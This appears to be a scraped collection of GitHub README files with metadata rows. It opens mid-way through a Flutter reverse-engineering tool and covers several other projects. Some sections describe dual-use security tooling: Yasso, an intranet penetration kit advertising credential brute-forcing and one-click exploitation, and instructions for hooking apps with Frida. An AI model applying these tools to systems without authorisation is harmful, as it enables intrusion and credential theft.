Function 'getAuthToken':. (dynamic, dynamic, dynamic, dynamic) => Future<AccessToken*>* {
Code Offset: _kDartIsolateSnapshotInstructions + 0x00000000003ee548
}
Function 'checkEmail':. (dynamic, dynamic) => Future<bool*>* {
Code Offset: _kDartIsolateSnapshotInstructions + 0x0000000000448a08
}
Function 'validateRestoreCode':. (dynamic, dynamic, dynamic) => Future<bool*>* {
Code Offset: _kDartIsolateSnapshotInstructions + 0x0000000000412c34
}
Function 'sendSmsRestorePassword':. (dynamic, dynamic) => Future<bool*>* {
Code Offset: _kDartIsolateSnapshotInstructions + 0x00000000003efb88
}
}
```
</details>
### Usage on iOS
Use the IPA file created after the execution of `reflutter main.ipa` command. To see which code is loaded through DartVM, you need to run the application on the device. reFlutter will print the dump file path to the Xcode console logs with the reFlutter tag
`Current working dir: /private/var/mobile/Containers/Data/Application/<UUID>/dump.dart`
Next, you will need to pull the file from the device
<p align="center"><img src="https://user-images.githubusercontent.com/87244850/135860648-a13ba3fd-93d2-4eab-bd38-9aa775c3178f.png" width="100%"/></p>
### Frida
The resulting offset from the dump can be used in the frida [script](https://github.com/Impact-I/reFlutter/blob/main/frida.js)
```
frida -U -f <package> -l frida.js --no-pause
```
To get value for `_kDartIsolateSnapshotInstructions` you can use `readelf -Ws libapp.so` Where is the value you need in the `Value` field
### To Do
- [x] Display absolute code offset for functions;
- [ ] Extract more strings and fields;
- [x] Add socket patch;
- [ ] Extend engine support to Debug using Fork and Github Actions;
- [ ] Improve detection of `App.framework` and `libapp.so` inside zip archive
### Build Engine
The engines are built using [reFlutter](https://github.com/Impact-I/reFlutter/blob/main/.github/workflows/main.yml) in [Github Actions](https://github.com/Impact-I/reFlutter/actions) to build the desired version, commits and snapshot hashes are used from this [table](https://github.com/Impact-I/reFlutter/blob/main/enginehash.csv).
The hash of the snapshot is extracted from `storage.googleapis.com/flutter_infra_release/flutter/<hash>/android-arm64-release/linux-x64.zip`
<details>
<summary>release</summary>
[![gif](https://user-images.githubusercontent.com/87244850/135758767-47b7d51f-8b6c-40b5-85aa-a13c5a94423a.gif)](https://github.com/Impact-I/reFlutter/actions)
</details>
### Custom Build
If you would like to implement your own patches, manual Flutter code change is supported using specially crafted [Docker](https://hub.docker.com/r/ptswarm/reflutter)
```bash
git clone https://github.com/Impact-I/reFlutter && cd reFlutter
docker build -t reflutter -f Dockerfile .
```
Build command:
```bash
docker run -it -v "$(pwd):/t" -e HASH_PATCH=<Snapshot_Hash> -e COMMIT=<Engine_commit> reflutter
```
Example:
```bash
docker run -it -v "$(pwd):/t" -e HASH_PATCH=aa64af18e7d086041ac127cc4bc50c5e -e COMMIT=d44b5a94c976fbb65815374f61ab5392a220b084 reflutter
```
# Linux, Windows
EXAMPLE BUILD ANDROID ARM64:
docker run -e WAIT=300 -e x64=0 -e arm=0 -e HASH_PATCH=<Snapshot_Hash> -e COMMIT=<Engine_commit> --rm -iv${PWD}:/t reflutter
FLAGS:
-e x64=0 <disables building for x64 architecture, use to reduce building time>
-e arm64=0 <disables building for arm64 architecture, use to reduce building time>
-e arm=0 <disables building for arm32 architecture, use to reduce building time>
-e WAIT=300 <the amount of time in seconds you need to edit source code>
-e HASH_PATCH=[Snapshot_Hash] <here you need to specify snapshot hash which matches the engine_commit line of enginehash.csv table best. It is used for proper patch search in reFlutter and for successfull compilation>
-e COMMIT=[Engine_commit] <here you specify commit for your engine version, take it from enginehash.csv table or from flutter/engine repo>
| Flutter Reverse Engineering Framework | bugbounty,mobile-security,reverse-engineering,ssl-pinning | 178 | 3 | 199 | 230 | 35 | 181 | 1 |
eip-work/kuboard-spray |
# KuboardSpray
基于 [kubespray](https://github.com/kubernetes-sigs/kubespray) 提供图形化的 K8S 集群离线安装、维护工具。
KuboardSpray 的在线文档地址为 [https://kuboard-spray.cn](https://kuboard-spray.cn)
## 快速安装
找一台不低于1核2G,不少于10G剩余磁盘空间,已经安装好 docker 的服务器,执行如下指令,即可完成 KuboardSpray 的安装:
``` sh
docker run -d \
--restart=unless-stopped \
--name=kuboard-spray \
-p 80:80/tcp \
-e TZ=Asia/Shanghai \
-v /var/run/docker.sock:/var/run/docker.sock \
-v ~/kuboard-spray-data:/data \
eipwork/kuboard-spray:latest-amd64
# 如果抓不到这个镜像,可以尝试一下这个备用地址:
# swr.cn-east-2.myhuaweicloud.com/kuboard/kuboard-spray:latest-amd64
```
在浏览器地址栏中输入 `http://这台机器的IP地址`,输入用户名 `admin`,默认密码 `Kuboard123`,即可登录 kuboard-spray 界面,剩下的事情,在界面上操作一下,您就会啦。如果有困难,试试这篇文档 <a href="https://kuboard-spray.cn/guide/install-k8s.html" target="_blank">使用 KuboardSpray 安装 Kubernetes 集群</a>
**常见问题**
* 导入资源包时,可能会碰到 `no such file or directory` 或者 `permission denied` 之类的错误提示,通常是因为您开启了 SELinux,导致 kuboard-spray 不能读取映射到容器 `/data` 的路径
* kuboard-spray 所在机器不能当做 K8S 集群的一个节点,因为安装过程中会重启集群节点的容器引擎,这会导致 kuboard-spray 被重启掉。
## 配置开发测试环境
[配置开发测试环境](./docs/setup-dev/dev.md)
## 自制资源包
Kuboard-Spray 将定期提供最新版本的资源包,可以在 kubord-spray 资源包管理界面中查到,如果您是离线环境,也可以在 [https://kuboard.cn/support/kuboard-spray/](https://kuboard-spray.cn/support/)找到最新的资源包。您也可以自己制作资源包,资源包的项目地址在 [kuboard-spray-resource](https://github.com/eip-work/kuboard-spray-resource),资源包的制作方法会在2022年2月提供文档。
## 社区
对此项目感兴趣的同学,请添加本项目的 Star 以后,扫码加入群聊,二维码在网站的页尾。
[kuboard-spray.cn](https://kuboard-spray.cn) | 使用图形化的界面离线安装、维护、升级高可用的 K8S 集群 | kubernetes,kubespray | 14 | 1 | 2 | 552 | 75 | 1 | 0 |
bytedance/android-inline-hook | # ShadowHook
![](https://img.shields.io/badge/license-MIT-brightgreen.svg?style=flat)
![](https://img.shields.io/badge/release-1.0.9-red.svg?style=flat)
![](https://img.shields.io/badge/Android-4.1%20--%2014-blue.svg?style=flat)
![](https://img.shields.io/badge/arch-armeabi--v7a%20%7C%20arm64--v8a-blue.svg?style=flat)
[**简体中文**](README.zh-CN.md)
**ShadowHook** is an Android inline hook library which supports thumb, arm32 and arm64.
ShadowHook is now used in TikTok, Douyin, Toutiao, Xigua Video, Lark.
If you need an Android PLT hook library, please move to [ByteHook](https://github.com/bytedance/bhook).
## Features
* Support Android 4.1 - 14 (API level 16 - 34).
* Support armeabi-v7a and arm64-v8a.
* Support hook for the whole function, but does not support hook for the middle position of the function.
* Support to specify the hook location by "function address" or "library name + function name".
* Automatically complete the hook of "newly loaded dynamic library" (only "library name + function name"), and call the optional callback function after the hook is completed.
* Multiple hooks and unhooks can be executed concurrently on the same hook point without interfering with each other (only in shared mode).
* Automatically avoid possible recursive calls and circular calls between proxy functions (only in shared mode).
* The proxy function supports unwinding backtrace in a normal way (CFI, EH, FP).
* Integrated symbol address search function.
* MIT licensed.
## Documentation
[ShadowHook Manual](doc/manual.md)
## Quick Start
You can refer to the sample app in [app module](app), or refer to the hook/unhook examples of commonly used system functions in [systest module](systest).
### 1. Add dependency in build.gradle
ShadowHook is published on [Maven Central](https://search.maven.org/), and uses [Prefab](https://google.github.io/prefab/) package format for [native dependencies](https://developer.android.com/studio/build/native-dependencies), which is supported by [Android Gradle Plugin 4.0+](https://developer.android.com/studio/releases/gradle-plugin?buildsystem=cmake#native-dependencies).
```Gradle
android {
buildFeatures {
prefab true
}
}
dependencies {
implementation 'com.bytedance.android:shadowhook:1.0.9'
}
```
**Note**: ShadowHook uses the [prefab package schema v2](https://github.com/google/prefab/releases/tag/v2.0.0), which is configured by default since [Android Gradle Plugin 7.1.0](https://developer.android.com/studio/releases/gradle-plugin?buildsystem=cmake#7-1-0). If you are using Android Gradle Plugin earlier than 7.1.0, please add the following configuration to `gradle.properties`:
```
android.prefabVersion=2.0.0
```
### 2. Add dependency in CMakeLists.txt or Android.mk
> CMakeLists.txt
```CMake
find_package(shadowhook REQUIRED CONFIG)
add_library(mylib SHARED mylib.c)
target_link_libraries(mylib shadowhook::shadowhook)
```
> Android.mk
```
include $(CLEAR_VARS)
LOCAL_MODULE := mylib
LOCAL_SRC_FILES := mylib.c
LOCAL_SHARED_LIBRARIES += shadowhook
include $(BUILD_SHARED_LIBRARY)
$(call import-module,prefab/shadowhook)
```
### 3. Specify one or more ABI(s) you need
```Gradle
android {
defaultConfig {
ndk {
abiFilters 'armeabi-v7a', 'arm64-v8a'
}
}
}
```
### 4. Add packaging options
If you are using ShadowHook in an SDK project, you may need to avoid packaging libshadowhook.so into your AAR, so as not to encounter duplicate libshadowhook.so file when packaging the app project.
```Gradle
android {
packagingOptions {
exclude '**/libshadowhook.so'
}
}
```
On the other hand, if you are using ShadowHook in an APP project, you may need to add some options to deal with conflicts caused by duplicate libshadowhook.so file.
```Gradle
android {
packagingOptions {
pickFirst '**/libshadowhook.so'
}
}
```
### 5. Initialize
ShadowHook supports two modes (shared mode and unique mode). The proxy function in the two modes is written slightly differently. You can try the unique mode first.
```Java
import com.bytedance.shadowhook.ShadowHook;
public class MySdk {
public static void init() {
ShadowHook.init(new ShadowHook.ConfigBuilder()
.setMode(ShadowHook.Mode.UNIQUE)
.build());
}
}
```
### 6. Hook and Unhook
```C
#include "shadowhook.h"
void *shadowhook_hook_func_addr(
void *func_addr,
void *new_addr,
void **orig_addr);
void *shadowhook_hook_sym_addr(
void *sym_addr,
void *new_addr,
void **orig_addr);
void *shadowhook_hook_sym_name(
const char *lib_name,
const char *sym_name,
void *new_addr,
void **orig_addr);
typedef void (*shadowhook_hooked_t)(
int error_number,
const char *lib_name,
const char *sym_name,
void *sym_addr,
void *new_addr,
void *orig_addr,
void *arg);
void *shadowhook_hook_sym_name_callback(
const char *lib_name,
const char *sym_name,
void *new_addr,
void **orig_addr,
shadowhook_hooked_t hooked,
void *hooked_arg);
int shadowhook_unhook(void *stub);
```
* `shadowhook_hook_func_addr`: hook a function (which has no symbol info in ELF) by absolute address.
* `shadowhook_hook_sym_addr`: hook a function (which has symbol info in ELF) by absolute address.
* `shadowhook_hook_sym_name`: hook a function by symbol name and ELF file name or path name.
* `shadowhook_hook_sym_name_callback`: Similar to `shadowhook_hook_sym_name`, but the specified callback function will be called after the hook is completed.
* `shadowhook_unhook`: unhook.
For example, let's try to hook `art::ArtMethod::Invoke`:
```C
void *orig = NULL;
void *stub = NULL;
typedef void (*type_t)(void *, void *, uint32_t *, uint32_t, void *, const char *);
void proxy(void *thiz, void *thread, uint32_t *args, uint32_t args_size, void *result, const char *shorty)
{
// do something
((type_t)orig)(thiz, thread, args, args_size, result, shorty);
// do something
}
void do_hook()
{
stub = shadowhook_hook_sym_name(
"libart.so",
"_ZN3art9ArtMethod6InvokeEPNS_6ThreadEPjjPNS_6JValueEPKc",
(void *)proxy,
(void **)&orig);
if(stub == NULL)
{
int err_num = shadowhook_get_errno();
const char *err_msg = shadowhook_to_errmsg(err_num);
LOG("hook error %d - %s", err_num, err_msg);
}
}
void do_unhook()
{
shadowhook_unhook(stub);
stub = NULL;
}
```
* `_ZN3art9ArtMethod6InvokeEPNS_6ThreadEPjjPNS_6JValueEPKc` is the function symbol name of `art::ArtMethod::Invoke` processed by C++ Name Mangler in libart.so. You can use readelf to view it. The C function does not have the concept of Name Mangler.
* The symbol name of `art::ArtMethod::Invoke` is different in previous versions of Android M. This example is only applicable to Android M and later versions. If you want to achieve better Android version compatibility, you need to handle the difference in function symbol names yourself.
## Contributing
* [Code of Conduct](CODE_OF_CONDUCT.md)
* [Contributing Guide](CONTRIBUTING.md)
* [Reporting Security vulnerabilities](SECURITY.md)
## License
ShadowHook is licensed by [MIT License](LICENSE).
ShadowHook uses the following third-party source code or libraries:
* [queue.h](shadowhook/src/main/cpp/third_party/bsd/queue.h)
BSD 3-Clause License
Copyright (c) 1991, 1993 The Regents of the University of California.
* [tree.h](shadowhook/src/main/cpp/third_party/bsd/tree.h)
BSD 2-Clause License
Copyright (c) 2002 Niels Provos <provos@citi.umich.edu>
* [linux-syscall-support](https://chromium.googlesource.com/linux-syscall-support/)
BSD 3-Clause License
Copyright (c) 2005-2011 Google Inc.
* [xDL](https://github.com/hexhacking/xDL)
MIT License
Copyright (c) 2020-2023 HexHacking Team
| :fire: ShadowHook is an Android inline hook library which supports thumb, arm32 and arm64. | android,inline,hook,inlinehook,androidinlinehook,arm,arm64,thumb,security,ndk | 8 | 10 | 0 | 72 | 5 | 2 | 0 |
YBIFoundation/Fundamental | # **Fundamental**
**[Watch Video Tutorial](https://www.youtube.com/c/YBIFoundation?sub_confirmation=1)**
**[Ask Doubt in FREE Live QnA Session](https://www.ybifoundation.org/session/live-qna-and-doubt-support)**
| Jupyter Notebook | null | 0 | 2 | 15 | 26 | 4 | 1 | 0 |
alibaba/async_simple | <p align="center">
<h1 align="center">async_simple</h1>
<h6 align="center">A Simple, Light-Weight Asynchronous C++ Framework</h6>
</p>
<p align="center">
<img alt="license" src="https://img.shields.io/github/license/alibaba/async_simple?style=flat-square">
<img alt="language" src="https://img.shields.io/github/languages/top/alibaba/async_simple?style=flat-square">
<img alt="feature" src="https://img.shields.io/badge/c++20-Coroutines-orange?style=flat-square">
<img alt="last commit" src="https://img.shields.io/github/last-commit/alibaba/async_simple?style=flat-square">
</p>
English | [中文](./README_CN.md)
async_simple is a library offering simple, light-weight and easy-to-use
components to write asynchronous code. The components offered include Lazy
(based on C++20 stackless coroutine), Uthread (based on stackful coroutine)
and the traditional Future/Promise.
# Quick Experience
We can try async_simple online in [compiler-explorer](compiler-explorer.com): https://compiler-explorer.com/z/Tdaesqsqj . Note that `Uthread` cannot be use in compiler-explorer since it requires installation.
# Get Started
Our documents are hosted by GitHub Pages, [go to Get Started](https://alibaba.github.io/async_simple/docs.en/GetStarted.html).
After installing and reading [Lazy](./docs/docs.en/Lazy.md) to get familiar with API, here is a [demo](./docs/docs.en/GetStarted.md) use Lazy to count char in a file.
# Install async_simple
## By Vcpkg
vcpkg is a [cross-platform package manager](https://vcpkg.io/en/getting-started).
```
./vcpkg install async-simple
```
## By Cmake
```
git clone -b main --single-branch --depth 1 https://github.com/alibaba/async_simple.git
cd async_simple
mkdir build
cd build
cmake .. -DASYNC_SIMPLE_ENABLE_TESTS=OFF -DASYNC_SIMPLE_BUILD_DEMO_EXAMPLE=OFF -DASYNC_SIMPLE_ENABLE_ASAN=OFF
cmake --build .
cmake --install . # --prefix ./user_defined_install_path
```
# Import async_simple
After install async_simple, you can import it to your project.
## By cmake find_package
please add those cmake codes:
```cmake
find_package(async_simple REQUIRED)
target_link_libraries(<your-target-name> PRIVATE async_simple::async_simple) # dynamic_link
# async_simple::async_simple_header_only
# async_simple::async_simple_static
```
`<your-target-name>` is the target name which want to use async_simple
## Manully
async_simple is almost header-only. So you can just pass the include path of the install position to your compiler.
But the uthread part of async_simple is not head-only. If you want to use uthread, You need link it manully. The library file is in the install path.
# Compiler Requirement
Required Compiler: clang (>= 10.0.0) or gcc (>= 10.3) or Apple-clang (>= 14)
Note that we need to add the `-Wno-maybe-uninitialized` option when we use gcc 12 due to a false positive diagnostic message by gcc 12
If you're using `async_simple::Generator`, there may be some compiler bugs in clang15. We suggest to use clang17 or higher for that.
If you meet any problem about MSVC Compiler Error C4737. Try to add the /EHa option to fix the problem.
# Develop async_simple
The build of async_simple requires libaio, googletest and cmake. Both libaio and googletest
are optional. (Testing before using is highly suggested.) By default, async_simple would try
to clone the googletest from git to make sure the version used is correct. But in case the
users have problems with networks, users can try to install the gtest libraries by the following instructions and use the CMake variables ('GMOCK_INCLUDE_DIR', 'GTEST_LIBRARIES', 'GMOCK_INCLUDE_DIR', 'GMOCK_LIBRARIES') to specify the location.
## Using apt (Ubuntu and Debian)
```bash
# Install libaio
sudo apt install libaio-dev -y
# Install cmake
sudo apt install cmake -y
# Install bazel See: https://bazel.build/install/ubuntu
```
- Use `apt` to install gtest and gmock
```bash
sudo apt install -y libgtest-dev libgmock-dev
```
- [Try to build gtest and gmock from source](#Build-Dependencies-From-Source)
```bash
# Install gtest
sudo apt install libgtest-dev -y
sudo apt install cmake -y
cd /usr/src/googletest/gtest
sudo mkdir build && cd build
sudo cmake .. && sudo make install
cd .. && sudo rm -rf build
cd /usr/src/googletest/gmock
sudo mkdir build && cd build
sudo cmake .. && sudo make install
cd .. && sudo rm -rf build
# Install bazel See: https://bazel.build/install/ubuntu
```
## Using yum (CentOS and Fedora)
```bash
# Install libaio
sudo yum install libaio-devel -y
```
- Use `yum` to install gtest, gmock
```
sudo yum install gtest-devel gmock-devel
```
- [Try to build gtest and gmock from source](#Build-Dependencies-From-Source)
## Using Pacman (Arch)
```bash
# Optional
sudo pacman -S libaio
# Use cmake to build project
sudo pacman -S cmake gtest
# Use bazel to build project
sudo pacman -S bazel
```
## Using Homebrew (macOS)
```bash
# Use cmake to build project
brew install cmake
brew install googletest
# Use bazel to build project
brew install bazel
```
## Windows
```powershell
# Install cmake
winget install cmake
# Install google-test
# TODO
# Install bazel See: https://bazel.build/install/windows
```
## Build Dependencies From Source
```
# libaio (optional)
# you can skip this if you install libaio from packages
git clone https://pagure.io/libaio.git
cd libaio
sudo make install
# gmock and gtest
git clone git@github.com:google/googletest.git -b v1.8.x
cd googletest
mkdir build && cd build
cmake .. && sudo make install
```
## Demo example dependency
Demo example depends on standalone asio(https://github.com/chriskohlhoff/asio/tree/master/asio), the commit id:f70f65ae54351c209c3a24704624144bfe8e70a3
# Build
## cmake
```bash
$ mkdir build && cd build
# Specify [-DASYNC_SIMPLE_ENABLE_TESTS=OFF] to skip tests.
# Specify [-DASYNC_SIMPLE_BUILD_DEMO_EXAMPLE=OFF] to skip build demo example.
# Specify [-DASYNC_SIMPLE_DISABLE_AIO=ON] to skip the build libaio
CXX=clang++ CC=clang cmake ../ -DCMAKE_BUILD_TYPE=[Release|Debug] [-DASYNC_SIMPLE_ENABLE_TESTS=OFF] [-DASYNC_SIMPLE_BUILD_DEMO_EXAMPLE=OFF] [-DASYNC_SIMPLE_DISABLE_AIO=ON] [-DGMOCK_INCLUDE_DIR=<path-to-headers of gtest> -DGTEST_INCLUDE_DIR=<path-to-headers of mock> -DGTEST_LIBRARIES=<path-to-library-of-gtest> -DGMOCK_LIBRARIES=<path-to-library-of-gmock> ]
# for gcc, use CXX=g++ CC=gcc
make -j4
make test # optional
make install # sudo if required
```
Conan is also supported. You can install async_simple to conan local cache.
```
mkdir build && cd build
conan create ..
```
## bazel
```bash
# Specify [--define=ASYNC_SIMPLE_DISABLE_AIO=true] to skip the build libaio
# Example bazel build --define=ASYNC_SIMPLE_DISABLE_AIO=true ...
bazel build ... # compile all target
bazel build ...:all # compile all target
bazel build ...:* # compile all target
bazel build -- ... -benchmarks/... # compile all target except those beneath `benchmarks`
bazel test ... # compile and execute tests
# Specify compile a target
# Format: bazel [build|test|run] [directory name]:[binary name]
# Example
bazel build :async_simple # only compile libasync_simple
bazel run benchmarks:benchmarking # compile and run benchmark
bazel test async_simple/coro/test:async_simple_coro_test
# Use clang toolchain
bazel build --action_env=CXX=clang++ --action_env=CC=clang ...
# Add compile option
bazel build --copt='-O0' --copt='-ggdb' ...
```
- See [this](https://bazel.build/run/build) get more infomation
- ` ...` Indicates recursively scan all targets, recognized as `../..` in `oh-my-zsh`, can be replaced by other `shell` or `bash -c 'commond'` to run, such as `bash -c 'bazel build' ...` or use `bazel build ...:all`
- Use `async_simple` as a dependency, see also [bazel support](bazel/support/README.md)
# Docker Compile Environment
```
git clone https://github.com/alibaba/async_simple.git
cd async_simple/docker/(ubuntu|centos7|rockylinux)
docker build . --no-cache -t async_simple:1.0
docker run -it --name async_simple async_simple:1.0 /bin/bash
```
# Performance
We also give a [Quantitative Analysis Report](docs/docs.en/QuantitativeAnalysisReportOfCoroutinePerformance.md) of
Lazy (based on C++20 stackless coroutine) and Uthread (based on stackful coroutine).
# C++20 Modules Support
We have **experimental** support for C++20 Modules in `modules/async_simple.cppm`.
We can build the `async_simple` module by `xmake` and `cmake`.
We can find the related usage in `CountChar`, `ReadFiles`, `LazyTest.cpp` and `FutureTest.cpp`.
We need clang (>= d18806e6733 or simply clang 16) to build the `async_simple` module.
It is only tested for libstdc++10.3. Due to the current support status for C++20, it won't be a surprise if the compilation fails in higher versions of STL.
We can build the `async_simple` module with xmake (>= 0eccc6e) using the commands:
```
xmake
```
We can build the `async_simple` module with cmake (>= d18806e673 or cmake 3.26 and up) using the following commands:
```
mkdir build_modules && cd build_modules
CC=clang CXX=clang++ cmake .. -DCMAKE_BUILD_TYPE=Release -DASYNC_SIMPLE_BUILD_MODULES=ON -GNinja
ninja
```
**Note** that the `async_simple` module in the main branch is actually a named module's wrapper for headers for compatability. We can find the practical usage of C++20 Modules in https://github.com/alibaba/async_simple/tree/CXX20Modules, which contains the support for xmake and cmake as well.
# Questions
For questions, we suggest to read [docs](./docs/docs.en), [issues](https://github.com/alibaba/async_simple/issues)
and [discussions](https://github.com/alibaba/async_simple/discussions) first.
If there is no satisfying answer, you could file an [issues](https://github.com/alibaba/async_simple/issues)
or start a thread in [discussions](https://github.com/alibaba/async_simple/discussions).
Specifically, for defect report or feature enhancement, it'd be better to file an [issues](https://github.com/alibaba/async_simple/issues). And for how-to-use questions, it'd be better to start a thread in [discussions](https://github.com/alibaba/async_simple/discussions).
# How to Contribute
1. Read the [How to fix issue](./docs/docs.en/HowToFixIssue.md) document firstly.
2. Run tests and `git-clang-format HEAD^` locally for the change. Note that the version of clang-format in CI is clang-format 14. So that it is possible your local
format result is inconsistency with the format result in the CI. In the case, you need to install the new clang-format or adopt the suggested change by hand. In case the format result is not good, it is OK to accept the PR temporarily and file an issue for the clang-formt.
3. Create a PR, fill in the PR template.
4. Choose one or more reviewers from contributors: (e.g., ChuanqiXu9, RainMark, foreverhy, qicosmos).
5. Get approved and merged.
# License
async_simple is distributed under the Apache License (Version 2.0)
This product contains various third-party components under other open source licenses.
See the NOTICE file for more information.
| Simple, light-weight and easy-to-use asynchronous components | asynchronous,coroutines,cpp20,modules,cpp20-modules | 4 | 26 | 248 | 281 | 18 | 3 | 8 |
sairson/Yasso | # Yasso
强大的内网渗透辅助工具集-让Yasso像风一样 支持rdp,ssh,redis,postgres,mongodb,mssql,mysql,winrm等服务爆破,快速的端口扫描,强大的web指纹识别,各种内置服务的一键利用(包括ssh完全交互式登录,mssql提权,redis一键利用,mysql数据库查询,winrm横向利用,多种服务利用支持socks5代理执行)
# 新版功能
在原基础上更改扫描和爆破方式,去除不必要的功能,代码更加完善和整洁<br>
增加协议上的识别和端口识别
* 新版并未发布release版本,请自行clone去编译
# 功能
```
Usage:
Yasso [command]
Available Commands:
all Use all scanner module (.attention) Traffic is very big
completion Generate the autocompletion script for the specified shell
exploit Exploits to attack the service
help Help about any command
service Detection or blasting services by module
Flags:
-h, --help help for Yasso
--output string set logger file (default "result.txt")
```
- all 一键扫描功能
- exploit 常见服务利用(sqlserver,redis,ssh,向日葵等)
- service 服务爆破和子扫描模块
详情请-h参考
| 强大的内网渗透辅助工具集-让Yasso像风一样 支持rdp,ssh,redis,postgres,mongodb,mssql,mysql,winrm等服务爆破,快速的端口扫描,强大的web指纹识别,各种内置服务的一键利用(包括ssh完全交互式登陆,mssql提权,redis一键利用,mysql数据库查询,winrm横向利用,多种服务利用支持socks5代理执行) | null | 7 | 2 | 1 | 55 | 5 | 1 | 0 |
KeenSecurityLab/BinAbsInspector | # What is BinAbsInspector?
BinAbsInspector (Binary Abstract Inspector) is a static analyzer for automated reverse engineering and scanning vulnerabilities in binaries, which is a long-term research project incubated at [Keenlab](https://keenlab.tencent.com/). It is based on abstract interpretation with the support from Ghidra. It works on Ghidra's Pcode instead of assembly. Currently it supports binaries on x86,x64, armv7 and aarch64.
# Installation
+ Install Ghidra according to [Ghidra's documentation](https://github.com/NationalSecurityAgency/ghidra#install)
+ Install [Z3](https://github.com/Z3Prover/z3) (tested version: 4.8.15)
+ Note that generally there are two parts for Z3 library: one is Java package, the other one is native library. The Java package is already included in "/lib" directory, but we suggest that you replace it with your own Java package for version compatibility.
+ For Windows, download a pre-built package from [here](https://github.com/Z3Prover/z3/releases), extract the zip file and add a PATH environment variable pointing to `z3-${version}-win/bin`
+ For Linux, install with package manager is NOT recommended, there are two options:
1. You can download suitable pre-build package from [here](https://github.com/Z3Prover/z3/releases), extract the zip file and copy `z3-${version}-glibc-${version}/bin/*.so` to `/usr/local/lib/`
2. or you can build and install z3 according to [Building Z3 using make and GCC/Clang](https://github.com/Z3Prover/z3#building-z3-using-make-and-gccclang)
+ For MacOS, it is similar to Linux.
+ Download the extension zip file from [release page](https://github.com/KeenSecurityLab/BinAbsInspector/releases)
+ Install the extension according to [Ghidra Extension Notes](https://ghidra-sre.org/InstallationGuide.html#GhidraExtensionNotes)
# Building
Build the extension by yourself, if you want to develop a new feature, please refer to [development guide](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Developer-Guide).
+ Install Ghidra and Z3
+ Install [Gradle 7.x](https://gradle.org/releases/) (tested version: 7.4)
+ Pull the repository
+ Run `gradle buildExtension` under repository root
+ The extension will be generated at `dist/${GhidraVersion}_${date}_BinAbsInspector.zip`
# Usage
You can run BinAbsInspector in headless mode, GUI mode, or with docker.
+ With Ghidra headless mode.
```
$GHIDRA_INSTALL_DIR/support/analyzeHeadless <projectPath> <projectName> -import <file> -postScript BinAbsInspector "@@<scriptParams>"
```
`<projectPath>` -- Ghidra project path.
`<projectName>` -- Ghidra project name.
`<scriptParams>` -- The argument for our analyzer, provides following options:
| Parameter | Description |
| ----------------------------------------- | --------------------------------------|
| `[-K <kElement>]` | KSet size limit [K](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Technical-Details#kset) |
| `[-callStringK <callStringMaxLen>]` | Call string maximum length [K](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Technical-Details#context)|
| `[-Z3Timeout <timeout>]` | Z3 timeout |
| `[-timeout <timeout>]` | Analysis timeout |
| `[-entry <address>]` | Entry address |
| `[-externalMap <file>]` | External function model config |
| `[-json]` | Output in json format |
| `[-disableZ3]` | Disable Z3 |
| `[-all]` | Enable all checkers |
| `[-debug]` | Enable debugging log output |
| `[-check "<cweNo1>[;<cweNo2>...]"]` | Enable specific checkers |
+ With Ghidra GUI
1. Run Ghidra and import the target binary into a project
2. Analyze the binary with default settings
3. When the analysis is done, open `Window -> Script Manager` and find `BinAbsInspector.java`
4. Double-click on `BinAbsInspector.java` entry, set the parameters in configuration window and click OK
5. When the analysis is done, you can see the CWE reports in console window, double-click the addresses from the report can jump to corresponding address
+ With Docker
```shell
git clone git@github.com:KeenSecurityLab/BinAbsInspector.git
cd BinAbsInspector
docker build . -t bai
docker run -v $(pwd):/data/workspace bai "@@<script parameters>" -import <file>
```
# Implemented Checkers
So far BinAbsInspector supports following checkers:
+ [CWE78](https://cwe.mitre.org/data/definitions/78.html) (OS Command Injection)
+ [CWE119](https://cwe.mitre.org/data/definitions/119.html) (Buffer Overflow (generic case))
+ [CWE125](https://cwe.mitre.org/data/definitions/125.html) (Buffer Overflow (Out-of-bounds Read))
+ [CWE134](https://cwe.mitre.org/data/definitions/134.html) (Use of Externally-Controlled Format string)
+ [CWE190](https://cwe.mitre.org/data/definitions/190.html) (Integer overflow or wraparound)
+ [CWE367](https://cwe.mitre.org/data/definitions/367.html) (Time-of-check Time-of-use (TOCTOU))
+ [CWE415](https://cwe.mitre.org/data/definitions/415.html) (Double free)
+ [CWE416](https://cwe.mitre.org/data/definitions/416.html) (Use After Free)
+ [CWE426](https://cwe.mitre.org/data/definitions/426.html) (Untrusted Search Path)
+ [CWE467](https://cwe.mitre.org/data/definitions/467.html) (Use of sizeof() on a pointer type)
+ [CWE476](https://cwe.mitre.org/data/definitions/476.htmll) (NULL Pointer Dereference)
+ [CWE676](https://cwe.mitre.org/data/definitions/676.html) (Use of Potentially Dangerous Function)
+ [CWE787](https://cwe.mitre.org/data/definitions/787.html) (Buffer Overflow (Out-of-bounds Write))
# Project Structure
The structure of this project is as follows, please refer to [technical details](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Technical-Details) or the [Chinese version article](https://keenlab.tencent.com/zh/2022/04/20/2022-BinAbsInspector-public-release/) for more details.
```
├── main
│ ├── java
│ │ └── com
│ │ └── bai
│ │ ├── checkers checker implementatiom
│ │ ├── env
│ │ │ ├── funcs function modeling
│ │ │ │ ├── externalfuncs external function modeling
│ │ │ │ └── stdfuncs cpp std modeling
│ │ │ └── region memory modeling
│ │ ├── solver analyze core and grpah module
│ │ └── util utilities
│ └── resources
└── test
```
You can also build the javadoc with `gradle javadoc`, the API documentation will be generated in `./build/docs/javadoc`.
# Acknowledgement
We employ [Ghidra](https://ghidra-sre.org/) as our foundation and frequently leverage [JImmutable Collections](http://brianburton.github.io/java-immutable-collections/) for better performance.
Here we would like to thank them for their great help!
| BinAbsInspector: Vulnerability Scanner for Binaries | binary-analysis,ghidra,reverse-engineering,security,static-analyzer,vulnerability-scanner,abstract-interpretation | 1 | 7 | 24 | 21 | 18 | 1 | 4 |
Oak-Harbor-Kits/Contract-Templates | # Contract-Templates (US only)
Simply download the contracts and fill in all the highlighted portions. I use Adobe Sign to add signature fields and send contracts to be e-signed. You print the word doc to a pdf and load that pdf into a new contract in Adobe Sign and at the bottom you add a signature field for the client and a name field and title field. When the client Opens the email they will be directed to sign and add their name and title where you specified. Boom, contract signed and it's saved in your account.
DISCLAIMER: This contract was written by my business contract lawyer, by downloading my contracts you are waiving the right to hold me or my lawyer liable for anything you do with it and that might come from it and your use of it. You are free to use these contracts and modify them to fit your businesses. As always, to be fully diligent, you may need to have a lawyer in your state look it over and make sure no adjustments are needed.
